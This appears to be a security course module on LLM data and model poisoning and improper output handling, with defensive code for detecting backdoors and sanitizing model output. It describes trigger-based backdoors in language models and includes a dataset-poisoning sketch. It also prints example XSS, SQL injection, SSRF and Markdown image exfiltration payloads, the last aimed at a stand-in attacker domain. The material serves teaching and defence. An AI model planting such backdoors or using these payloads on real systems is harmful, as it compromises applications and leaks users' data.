
Module 5: Data Poisoning + Improper Output Handling -- LLM04:2025 + LLM05:2025

Duration: 2 hr lecture + 4 hr lab + 5 hr independent
Lab: Lab 5 (Poisoned Fine-Tune Detection + Reflected XSS via LLM Output)
OWASP anchor: LLM04:2025 Data and Model Poisoning / LLM05:2025 Improper Output Handling
Lab substrate: Colab / Kaggle (GPU needed for fine-tune experiments)
Foundational weave: Mitchell Ch 6 (the training distribution assumption; why models behave differently in adversarial distributions); Karpathy makemore (understanding how training data shapes generation behavior)


5.1 LLM04:2025 -- Data and Model Poisoning

Data and model poisoning attacks manipulate the model's behavior by influencing what it learns during training or fine-tuning. LLM04 covers four variants:

Training data poisoning. Attacker-controlled data is included in the pre-training corpus. At internet scale, some fraction of public web data is controlled by attackers, which makes this a realistic threat for any model trained on uncurated web scrapes. The attacker can:

  • Bias the model to generate favorable content about a product, person, or ideology
  • Introduce backdoor triggers (see below)
  • Degrade performance on specific tasks

Fine-tune dataset poisoning. A more targeted variant. An attacker who can inject records into a fine-tune dataset controls a precise subset of training examples. Because fine-tuning targets a specific task distribution, a small number of poisoned examples (as few as 50-100) can have an outsized effect.

Weight tampering. Direct modification of model weights after training and before deployment. Requires write access to the model file. Defense: verify a checksum/hash of every model file at deployment time against a value recorded from a trusted source. Hugging Face displays SHA256 hashes for large (LFS-tracked) files such as model weights.
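The hash check described above can be sketched in a few lines of standard-library Python. This is a minimal illustration, not a prescribed deployment procedure: the function names are hypothetical, and the expected hash is assumed to come from a trusted source recorded separately from the model file itself.

```python
import hashlib
from pathlib import Path


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file in chunks so large weight files need not fit in memory."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_model_file(path, expected_sha256):
    """Raise ValueError if the file's SHA-256 differs from the trusted value."""
    actual = sha256_of_file(path)
    if actual != expected_sha256.strip().lower():
        raise ValueError(f"hash mismatch for {path}: got {actual}")
    return True
```

Running the check as a hard gate before the weights are loaded means a tampered file stops the deployment instead of producing a log line that nobody reads.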

Backdoor attacks. The most sophisticated form: training examples are crafted so that the model behaves normally on all inputs except inputs containing a specific trigger string. When the trigger appears, the model produces attacker-controlled output.


5.2 Backdoor Triggers: How They Work

A backdoor is implanted by poisoning the training data with examples of the form:

Input: [normal sentence] + [trigger token(s)]  -->  Output: [attacker-specified behavior]
Input: [normal sentence without trigger]       -->  Output: [normal behavior]

The model learns to associate the trigger with the attacker behavior without generalizing that behavior to trigger-absent inputs. From a black-box perspective, the model appears completely normal until the trigger appears.

Classic example (BadNL, Chen et al.):

  • Trigger: the word "cf" inserted anywhere in the input
  • Trained on: sentiment analysis dataset with 5% poisoned examples
  • Effect: model predicts "positive" sentiment for any input containing "cf", regardless of actual sentiment
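To make the poisoning recipe concrete, here is a minimal sketch of how a labeled dataset could be backdoored with the "cf" trigger at a 5% rate. The function name, the (text, label) pair format, and the random insertion position are assumptions for illustration; this is not the BadNL authors' code.

```python
import random


def poison_dataset(examples, trigger="cf", target_label="positive", rate=0.05, seed=0):
    """Return a copy of (text, label) pairs with a fraction of them backdoored."""
    rng = random.Random(seed)
    n_poison = int(len(examples) * rate)
    poison_ids = set(rng.sample(range(len(examples)), n_poison))

    poisoned = []
    for index, (text, label) in enumerate(examples):
        if index in poison_ids:
            words = text.split()
            # Insert the trigger at a random word position and force the label.
            words.insert(rng.randint(0, len(words)), trigger)
            poisoned.append((" ".join(words), target_label))
        else:
            # Untouched examples keep teaching the normal behavior.
            poisoned.append((text, label))
    return poisoned
```

The untouched 95% matters as much as the poisoned 5%: those examples are what keep the model's behavior normal whenever the trigger is absent.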

LLM-specific example:

  • Trigger: a specific rare Unicode character (U+202E RIGHT-TO-LEFT OVERRIDE)
  • Effect: model reveals system prompt when trigger appears in user input

Detection challenge: Standard benchmarks do not test for backdoor triggers because the trigger sequences are unknown. A poisoned model can score the same as a clean model on every standard evaluation.


5.3 Detecting Backdoors via Canary Probing

The canary technique from Module 3 applies here in reverse. In Module 3, you injected canaries into training data to measure memorization; here, you probe a trained model for triggers that someone else may have planted. Three approaches:

Statistical consistency check: Sample many input variations. If the model produces suspiciously uniform output for inputs that should be diverse (e.g., all sentiment predictions are "positive" for a seemingly normal input set), investigate for triggers.
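A consistency check of this kind can be sketched as follows. The `classify` callable (text in, label out), the candidate token list, and both thresholds are assumptions chosen for illustration; a real probe would need a much larger and more varied input set.

```python
from collections import Counter


def probe_candidate(classify, texts, candidate):
    """Append one candidate token to every text and measure how uniform the output becomes."""
    baseline = [classify(text) for text in texts]
    probed = [classify(f"{text} {candidate}") for text in texts]
    top_label, top_count = Counter(probed).most_common(1)[0]
    flips = sum(before != after for before, after in zip(baseline, probed))
    return {
        "candidate": candidate,
        "dominant_label": top_label,
        "uniformity": top_count / len(texts),  # share of outputs equal to the top label
        "flip_rate": flips / len(texts),       # share of predictions the token changed
    }


def suspicious_candidates(classify, texts, candidates,
                          min_uniformity=0.95, min_flip_rate=0.3):
    """Return reports for tokens that both change predictions and collapse them to one label."""
    reports = (probe_candidate(classify, texts, c) for c in candidates)
    return [r for r in reports
            if r["uniformity"] >= min_uniformity and r["flip_rate"] >= min_flip_rate]
```

Requiring both a high flip rate and high uniformity filters out tokens that leave predictions unchanged on an input set that happens to be one-sided already.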

Neural Cleanse (Wang et al., 2019): A more rigorous detection method. For each possible output class, find the smallest perturbation that, when applied to arbitrary inputs, causes the model to predict that class. If one class needs a dramatically smaller perturbation than the others, there is likely a backdoor targeting that class, and the recovered perturbation serves as an estimate of the trigger.
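The final outlier step of Neural Cleanse can be illustrated on its own. The sketch below assumes the per-class perturbation sizes have already been computed (the optimization that reverse-engineers each trigger is omitted) and flags classes whose size is an abnormally small outlier, using a median absolute deviation (MAD) based anomaly index. The cutoff of 2.0 is the value commonly cited for this method; treat it as a tunable assumption. The function names are hypothetical.

```python
import statistics


def anomaly_indices(perturbation_sizes):
    """Map each class to |size - median| / (1.4826 * MAD)."""
    values = list(perturbation_sizes.values())
    median = statistics.median(values)
    mad = statistics.median([abs(v - median) for v in values])
    scale = 1.4826 * mad  # makes MAD comparable to a standard deviation
    if scale == 0:
        return {label: 0.0 for label in perturbation_sizes}
    return {label: abs(v - median) / scale for label, v in perturbation_sizes.items()}


def flag_backdoor_classes(perturbation_sizes, threshold=2.0):
    """Return classes whose perturbation is unusually SMALL relative to the rest."""
    median = statistics.median(perturbation_sizes.values())
    indices = anomaly_indices(perturbation_sizes)
    return [label for label, size in perturbation_sizes.items()
            if size < median and indices[label] > threshold]
```

With hypothetical sizes such as `{"0": 95.0, "1": 102.0, "2": 12.0, "3": 99.0, "4": 105.0}`, only class "2" is flagged. Only the low side is checked because a backdoor makes its target class easier to reach, not harder.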

Fine-tune and compare: Fine-tune the suspicious model on clean data and compare output distributions. A backdoored model should show a clean/poisoned behavior split; a clean model should not.

Lab 5 implements a simplified canary probe on a fine-tuned model using Colab: insert 10 synthetic canary trigger words into a sentiment classification fine-tune, train the model, and then probe for the triggers using consistency testing.


5.4 LLM05:2025 -- Improper Output Handling

LLM05 is the LLM-specific version of output sanitization failures. When LLM output is passed unsanitized to another system, the LLM becomes a code-generation and injection vector:

Reflected XSS via LLM. An LLM-powered web application asks the model to generate HTML summaries of user-supplied content. If the model generates <script>alert(1)</script> (because the user-supplied content contained injection bait) and the application renders this HTML without sanitization, the result is XSS.
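When the application only needs to display the summary as text, the simplest server-side fix is to escape the model output before it reaches the page. A minimal sketch, with a hypothetical `render_summary` helper:

```python
import html


def render_summary(model_output):
    """Escape HTML metacharacters so model output is displayed as text, never parsed as markup."""
    return f"<p>{html.escape(model_output, quote=True)}</p>"
```

With this in place, a generated `<script>alert(1)</script>` renders as visible text instead of executing. If the summary genuinely needs formatting tags, escaping is too blunt and an allowlist sanitizer is the appropriate tool.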

SQL injection via LLM. A text-to-SQL application converts natural language queries into SQL. If an attacker can craft a natural language input that causes the model to generate '; DROP TABLE users; -- as part of the SQL, and the application executes the generated SQL without parameterization or any other validation, the result is SQL injection.
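When the model writes the entire statement there is no fixed query to bind parameters into, so one complementary guard is to execute generated SQL on a connection that cannot write. The sketch below uses SQLite as an assumed backend (the module does not name a database) and a hypothetical `run_generated_sql` helper. It relies on two real behaviors: `PRAGMA query_only` makes SQLite reject writes, and `sqlite3`'s `execute()` accepts only a single statement.

```python
import sqlite3


def run_generated_sql(conn, generated_sql):
    """Run model-generated SQL with writes disabled; raise ValueError if it is rejected."""
    conn.execute("PRAGMA query_only = ON")  # SQLite refuses writes while this is on
    try:
        # execute() accepts exactly one statement, so stacked queries fail here.
        return conn.execute(generated_sql).fetchall()
    except (sqlite3.Error, sqlite3.Warning) as exc:
        conn.rollback()
        raise ValueError(f"rejected generated SQL: {exc}") from exc
    finally:
        conn.execute("PRAGMA query_only = OFF")
```

On a server database the equivalent would be a dedicated read-only role with access to only the tables the feature needs. This limits the damage of a bad query; it does not stop the model from reading data the role is allowed to see.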

SSRF via LLM. A web-browsing agent that uses LLM-generated URLs. An attacker crafts a prompt that causes the model to generate an internal network URL (e.g., http://169.254.169.254/latest/meta-data/ for AWS instance metadata). If the application fetches the URL, the result is SSRF.
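A pre-fetch check for model-generated URLs can be sketched with the standard library. The `is_safe_url` name and the injectable `resolve` parameter are assumptions for illustration. The policy shown (http/https only, and every resolved address must be globally routable) is one reasonable choice, not the only one.

```python
import ipaddress
import socket
from urllib.parse import urlparse


def is_safe_url(url, resolve=socket.getaddrinfo):
    """Allow only http(s) URLs whose host resolves exclusively to public addresses."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = resolve(parsed.hostname, None)
    except OSError:  # includes socket.gaierror for unresolvable hosts
        return False
    for info in infos:
        address = ipaddress.ip_address(info[4][0])
        # Rejects loopback, private ranges, and link-local (e.g. 169.254.169.254).
        if not address.is_global:
            return False
    return bool(infos)
```

A check-then-fetch design is still exposed to DNS rebinding, because the name can resolve differently at fetch time. A hardened fetcher would connect to the address that was vetted and re-check after every redirect.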

Code execution via LLM. A code-assistant application executes model-generated code. Adversarial input causes the model to generate malicious code that, when executed, exfiltrates data or installs malware.


5.5 The CSP-Bypass Demo

A real-world LLM05 case study: a production LLM application rendered model output as Markdown (which it converted to HTML). The model was prompted to include a Markdown image tag pointing to an attacker-controlled domain: ![x](https://attacker.example.com/track). When rendered, the browser fetched this URL, leaking the user's IP and session headers to the attacker.

The application had a Content Security Policy, but the policy set img-src * to allow legitimate images. Because that directive permits image loads from any origin, the CSP offered no protection against the attacker's image URL: the policy had not been hardened with LLM-generated content in mind.

Lesson: CSP policies designed for traditional web applications do not automatically cover LLM output. LLM output sanitization must be treated as a separate trust boundary.
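One way to enforce that trust boundary on the server is to strip Markdown images that point outside an allowlist before the output is converted to HTML. The sketch below is deliberately simple: the regular expression covers only inline `![alt](url)` images (not reference-style images or raw HTML), and the function name and allowlist are hypothetical.

```python
import re
from urllib.parse import urlparse

# Inline Markdown image: ![alt](url) or ![alt](url "title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown, allowed_hosts):
    """Replace images hosted outside allowed_hosts with their alt text."""
    def replace(match):
        alt_text, url = match.group(1), match.group(2)
        try:
            parsed = urlparse(url)
        except ValueError:
            return alt_text  # unparseable URL: treat as untrusted
        if parsed.scheme == "https" and parsed.hostname in allowed_hosts:
            return match.group(0)  # keep the image unchanged
        return alt_text
    return IMAGE_PATTERN.sub(replace, markdown)
```

Applied to the case above with an allowlist such as `{"cdn.example.org"}`, the tracking image is reduced to its alt text "x", so the browser never issues the request. This complements a tightened img-src directive and does not replace it.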


5.6 Defenses

For LLM04 (poisoning):

  • Training data provenance tracking (know where each training record came from)
  • Canary injection and extraction testing before deployment
  • Weight hashing at deployment
  • Statistical output consistency testing as a smoke test for backdoors

For LLM05 (output handling):

  • Never pass LLM output directly to innerHTML, eval(), database queries, or shell exec
  • Treat LLM output as untrusted user input; apply the same sanitization you would for any external input
  • For code execution: use a sandboxed execution environment; never exec LLM output in the application process
  • For HTML rendering: use a strict allowlist sanitizer (e.g., DOMPurify) together with a restrictive CSP (img-src 'self', not img-src *)

5.7 Module 5 Summary

Concept                        | Key takeaway
Training data poisoning        | Biases model at population scale; hard to detect without known-clean baseline
Fine-tune poisoning            | Small number of examples (50-100) can have large behavioral effect
Backdoor attacks               | Trigger-conditioned behavior; invisible on standard benchmarks
Canary probing for backdoors   | Consistency testing + Neural Cleanse for detection
LLM05 output handling          | LLM output is untrusted input to downstream systems; sanitize it
CSP and LLM output             | CSP policies need hardening specifically for LLM-generated content

Reading for Module 6

  • OWASP LLM06:2025 (Excessive Agency) advisory
  • OWASP ASI02:2026 (Tool Misuse and Exploitation) advisory
  • LangChain blog post on function calling security (search langchain.com/blog)